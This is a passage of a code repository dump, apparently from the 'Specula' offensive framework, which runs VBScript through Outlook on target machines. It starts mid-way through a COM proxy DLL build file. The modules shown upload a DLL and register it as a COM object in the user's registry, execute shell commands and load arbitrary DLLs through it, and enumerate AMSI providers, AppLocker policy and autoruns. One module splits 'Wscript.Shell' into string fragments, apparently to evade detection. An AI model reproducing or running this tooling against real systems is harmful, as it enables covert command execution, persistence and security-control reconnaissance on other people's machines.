echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PreprocessorDefinitions>WIN32;REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PreprocessorDefinitions>WIN32;REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Optimization>MaxSpeed</Optimization>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PreprocessorDefinitions>REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Optimization>MaxSpeed</Optimization>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="..\SpeculaApi\SpeculaApips.def" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\SpeculaApi\dlldata.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_i.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_p.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Generated Files">
<UniqueIdentifier>{3be6a7fa-d612-40eb-b2df-d2d4ff8b27b2}</UniqueIdentifier>
<SourceControlFiles>False</SourceControlFiles>
</Filter>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="..\SpeculaApi\SpeculaApips.def">
<Filter>Source Files</Filter>
</None>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\SpeculaApi\SpeculaApi_i.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_p.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="..\SpeculaApi\dlldata.c">
<Filter>Generated Files</Filter>
</ClCompile>
</ItemGroup>
</Project>
================================================
FILE: functions/api/install_api.py
================================================
import copy
import os
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,makebool
from lib.core.utility import TaskClass
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Sets reg keys to install com object to interface with Windows API.
This module uploads the OutlookHelper DLL file automatically (Queued as tasks).
In order to leverage the API modules you need to run the api_verify at least once so that the verification
process runs on target and updates the specula database.
"""
self.entry = 'install_api'
self.depends = ['./helperFunctions/Setregvalue_hkcu.txt']
self.options['file'] = {
"value": "c:\\com-test\\v2\\specula_com.dll",
"required": True,
"description": "Where to upload and register api dll",
"handler": quotedstring
}
self.options['addverifytask'] = {
"value": "True",
"required": True,
"description": "Will add the verify task as the next task if this is set to true.",
"handler": makebool
}
super().__init__(templatepath)
def rethandler(self, agent, options, data):
# Updating DB with the dll paths used and setting installed to true and verified to False
arch = data[:2]
localdll = None
basefile = "SpeculaApi"
if arch == "64":
localdll = os.path.join(self.helpers.getpayloaddir(), "api/" + basefile + ".x64.dll")
self.helpers.speclog("Identified 64 bit office install, uploading 64 bit dll", False)
agent.officearch = "x64"
elif arch == "32":
localdll = os.path.join(self.helpers.getpayloaddir(), "api/" + basefile + ".dll")
self.helpers.speclog("Identified 32 bit office install, uploading 32 bit dll", False)
agent.officearch = "x86"
else:
self.helpers.speclog("Failed to detect office arch, api install failed", True)
mod = self.helpers.get_module('api/remove_api')
mod.options['deletedlls']['value'] = "False"
task = TaskClass('api/remove_api',
self.helpers.renderModule(mod, agent),
mod.entry,
copy.deepcopy(mod.options),
True)
agent.add_task(task)
return
# Add task to create the folder - Just in case
folderpath = (options['file']['value']).rsplit('\\', 1)[0] #remove filename from path
mod = self.helpers.get_module('operation/file/create_dir')
mod.options['directory']['value'] = folderpath
task = TaskClass('operation/file/create_dir',
self.helpers.renderModule(mod, agent),
mod.entry,
copy.deepcopy(mod.options),
True)
agent.add_task(task)
#queue dll upload
mod = self.helpers.get_module('operation/file/put_file')
mod.options['file']['value'] = localdll
mod.options['destination']['value'] = options['file']['value']
task = TaskClass('operation/file/put_file',
self.helpers.renderModule(mod, agent),
mod.entry,
copy.deepcopy(mod.options),
True)
agent.add_task(task)
agent.api_dll = options['file']['value']
agent.api_installed = True
if options['addverifytask']['value']:
mod = self.helpers.get_module('api/verify_api')
task = TaskClass('api/verify_api',
self.helpers.renderModule(mod, agent),
mod.entry,
{},
True)
agent.add_task(task)
================================================
FILE: functions/api/install_api.txt
================================================
Function install_api()
On Error Resume Next
is64 = false
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath
if InStr(strPath, "x86") > 0 Then
SetValue_HKCU_Registry = "32"
else
SetValue_HKCU_Registry = "64"
is64 = true
end if
basepath = "software\classes\"
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula\CurVer", "REG_SZ", "@", "SpeculaApi.Specula.1") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula.1", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula.1\CLSID", "REG_SZ", "@", "{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\InprocServer32", "REG_SZ", "@", {{file}}) & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\InprocServer32", "REG_SZ", "ThreadingModel", "Free") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\ProgId", "REG_SZ", "@", "SpeculaApi.Specula.1") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\Programmable", "REG_SZ", "@", "") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\TypeLib", "REG_SZ", "@", "{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\Version", "REG_SZ", "@", "1.0") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\VersionIndependentProgID", "REG_SZ", "@", "SpeculaApi.Specula") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0", "REG_SZ", "@", "SpeculaApiLib") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\FLAGS", "REG_SZ", "@", "0") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\0\win32", "REG_SZ", "@", {{file}}) & vbCrLf
if (is64) then
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\0\win64", "REG_SZ", "@", {{file}}) & vbCrLf
end if
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}", "REG_SZ", "@", "ISepcula") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\ProxyStubClsid32", "REG_SZ", "@", "{00020424-0000-0000-C000-000000000046}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\TypeLib", "REG_SZ", "@", "{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\TypeLib", "REG_SZ", "Version", "1.0") & vbCrLf
install_api = SetValue_HKCU_Registry
End Function
================================================
FILE: functions/api/load_dll.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Loads a dll from disk using LoadLibrary
"""
self.entry = 'load_dll'
self.depends = []
self.options['dll'] = {
"value": None,
"required": True,
"description": "dll to load",
"handler": None
}
super().__init__(templatepath)
def preprocess(self, agent):
if agent.api_verified != True:
raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true")
================================================
FILE: functions/api/load_dll.txt
================================================
Function load_dll
on error resume next
Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
if SpeculaApi.LoadDll("{{dll}}") = 1 Then
load_dll = "True"
Else
load_dll = "False"
End If
End Function
================================================
FILE: functions/api/remove_api.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,makebool
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Removes the registry values set by the install_outlookhelperapi.
"""
self.entry = 'remove_api'
self.depends = ['./helperFunctions/Delregkey_hkcu.txt', './helperFunctions/Delregvalue_hkcu.txt']
self.options['deletedlls'] = {
"value": "True",
"required": True,
"description": "Attempt to delete dll from disk, won't work if its been loaded into outlook",
"handler": makebool
}
self.options['dll'] = {
"value": "autoresolve",
"required": True,
"description": "Path to file on disk, let it be autoresolve to find path in specula db",
"handler": quotedstring
}
super().__init__(templatepath)
def preprocess(self, agent):
if self.options['deletedlls']['value'] == "True":
if self.options['dll']['value'] == "autoresolve":
if agent.api_dll:
self.options['dll']['value'] = agent.api_dll
else:
raise RuntimeError("No value found in Specula DB for api_dll - Rerun and specify path manually or set deletedlls to False")
def rethandler(self, agent, options, data):
# Updating DB with the dll paths used and setting installed to true and verified to False
agent.api_dll = None
agent.api_installed = False
agent.api_verified = False
================================================
FILE: functions/api/remove_api.txt
================================================
Function remove_api()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
basepath = "software\classes\"
regdelres = DelRegKey_HKCU(basepath + "OutLookHelper.Sysinfo") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "SpeculaApi.Specula.1") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "Interface\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf
if {{deletedlls}} = True Then
If fs.FileExists({{dll}}) = True Then
fs.DeleteFile {{dll}}
else
End If
If fs.FileExists({{dll}}) = True Then
filedelres = filedelres & "Delete file: " & {{dll}} & " - Fail" & vbCrlf
else
filedelres = filedelres & "Delete file: " & {{dll}} & " - Success!" & vbCrlf
End If
remove_api = regdelres & filedelres
else
remove_api = regdelres
End if
End Function
================================================
FILE: functions/api/run_shell.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Run a basic shell command via the installed com object
"""
self.entry = 'run_shell_api'
self.depends = []
self.options['cmd'] = {
"value": None,
"required": True,
"description": "Command to execute",
"handler": None
}
super().__init__(templatepath)
def preprocess(self, agent):
if agent.api_verified != True:
raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true")
================================================
FILE: functions/api/run_shell.txt
================================================
Function run_shell_api()
on error resume next
Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
run_shell_api = SpeculaApi.RunShell("{{cmd}}")
End Function
================================================
FILE: functions/api/verify_api.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Checks if the API is working or not. If this returns an error you should investigate the api installation.
1. Is the dll present on system? The dll paths pushed through the install_api module can be found under info/dbdata.
2. Is the necesarry registry keys present on the host?
3. Consider re-running the api_install
4. Could it be an EDR blocking you :INSERT SCREAMING GIF HERE:
"""
self.entry = 'api_verify'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
if data == "False":
agent.api_verified = False
if data == "True":
agent.api_verified = True
================================================
FILE: functions/api/verify_api.txt
================================================
Function api_verify()
On error resume next
Set specApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
If IsObject(specApi) Then
api_verify = True
else
api_verify = False
End if
End Function
================================================
FILE: functions/enumerate/host/list_amsiproviders.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the AMSI Providers registered on the system.
Based on MS documentation:
https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371
Gets the GUID and figures out the names from the Classes\\guid table in registry
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumKey
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_amsiproviders'
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_amsiproviders.txt
================================================
Function list_amsiproviders()
On error resume next
const REG_SZ = 1
const REG_EXPAND_SZ = 2
const REG_BINARY = 3
const REG_DWORD = 4
const REG_MULTI_SZ = 7
const REG_QWORD = 11
myoutput = "Registered AMSI providers found on system:" & vbCrLf
Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet")
oCtx.Add "__ProviderArchitecture", 64
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv")
objreg.EnumKey 2147483650, "Software\Microsoft\AMSI\Providers", arrKeys
For Each subkey in arrKeys
myoutput = myoutput & "Provider guid: " & subkey & vbCrLf
objReg.GetStringValue 2147483650,"Software\Classes\CLSID\" & subkey,"",strValue
myoutput = myoutput & "CLSID name: " & strValue & vbCrLf & vbCrLf
Next
list_amsiproviders = myoutput
End Function
================================================
FILE: functions/enumerate/host/list_applocker.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the status of AppLocker.
It returns one of the following statuses:
- Not Enabled
- Auditing
- Enforced
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumKey
- ConnectServer(root\cimv2).GetDwordValue
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_applocker'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_applocker.txt
================================================
Function list_applocker()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
ALlog = "Enumerate AppLocker status:" & vbCrLf
KeyPathAL = "Software\Policies\Microsoft\Windows\SrpV2\"
results = objReg.EnumKey(2147483650, KeyPathAL, arrSubkeysAL)
If results <> 0 Then
ALlog = ALlog & "AppLocker disabled!"
list_applocker = ALlog
Else
ALlog = ALlog & "AppLocker enabled!" & vbCrlf
For Each strSubkeyAL In arrSubkeysAL
status = objReg.GetDwordValue(2147483650, KeyPathAL & strSubkeyAL, "EnforcementMode", sectionMode)
If status <> 0 Then
val = "Not Enabled"
Else
If sectionMode = 1 Then
val = "Enforced"
ElseIf sectionMode = 0 Then
val = "Auditing"
End If
resul = objReg.EnumKey(2147483650, KeyPathAL & strSubKeyAL, arrSectionSub)
AppLockerRules = AppLockerRules & "AppLocker Rule section: " & strSubKeyAL & vbCrlf
For Each strSub in arrSectionSub
res = objReg.GetStringValue(2147483650, KeyPathAL & strSubKeyAL & "\" & strSub, "Value", outrules)
AppLockerRules = AppLockerRules & outrules & vbCrlf
Next
End If
ALlog = ALlog & "EnforcementMode for " & strSubKeyAl & " Is " & val & vbCrlf
Next
list_applocker = ALlog & vbCrlf & AppLockerRules
End If
End Function
================================================
FILE: functions/enumerate/host/list_autoruns.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates autoruns defined on the agent
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumValues
- ConnectServer(root\cimv2).GetDwordValue
- ConnectServer(root\cimv2).GetStringValue
- ConnectServer(root\cimv2).GetExpandedStringValue
- ConnectServer(root\cimv2).GetBinaryValue
- ConnectServer(root\cimv2).GetMultiStringValue
- ConnectServer(root\cimv2).GetQWORDValue
It uses Scripting.FileSystemObject
- GetFolder
- GetFolder().Files
- GetBaseName
- GetExtensionName
"""
self.entry = 'list_autoruns'
self.depends = ['./helperFunctions/Getallregvalues.txt', './helperFunctions/Getregvalue.txt', './helperFunctions/dir_lister.txt']
self.options['username'] = {
"value": "Dummy",
"required": True,
"description": "Username, autoresolves to agents registered username",
"handler": quotedstring,
"hidden": False
}
super().__init__(templatepath)
def preprocess(self, agent):
self.options['username']['value'] = agent.username
================================================
FILE: functions/enumerate/host/list_autoruns.txt
================================================
Function list_autoruns()
On error resume next
list_autoruns = "HKCU Autoruns:" & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\run", 64, 2147483649)
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\runonce", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\RunServices", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\RunServicesOnce", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows NT\CurrentVersion\Windows\load", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & vbCrLf
'HKLM
list_autoruns = list_autoruns & "HKLM Autoruns:" & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Run", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Run", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnce", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnce", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnceEx", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnceEx", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunServicesOnce", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunServices", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Userinit", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Shell", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad", "WebCheck", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", "AppInit_DLLs", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
'Files
list_autoruns = list_autoruns & "FILE Autoruns:" & vbCrLf
list_autoruns = list_autoruns & dir_lister("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp", 0, False, "*", "*", True, "mb") & vbCrLf
list_autoruns = list_autoruns & dir_lister("C:\Users\" & {{username}} & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", 0, False, "*", "*", True, "mb") & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_basic.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates basic details about the host. It retrieves:
- %Computername%
- %Username%
- %Userdomain%
- %Userprofile%
- %Userdnsdomain%
- %Logonserver%
- %Homepath%
It uses Wscript.Shell
- ExpandEnvironmentStrings
"""
self.entry = 'list_basic'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
if ("-VSTO" not in agent.hostname): # Handle exception when VSTO agents are used
agent.hostname = data.split()[3]
agent.username = data.split()[1]
================================================
FILE: functions/enumerate/host/list_basic.txt
================================================
Function list_basic()
On error resume next
Set sh = window.external.OutlookApplication.CreateObject("Wsc" & "ript.Sh" & "ell")
gds = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
huj = sh.ExpandEnvironmentStrings("%USERNAME%")
imd = sh.ExpandEnvironmentStrings("%USERDOMAIN%")
fvy = sh.ExpandEnvironmentStrings("%USERPROFILE%")
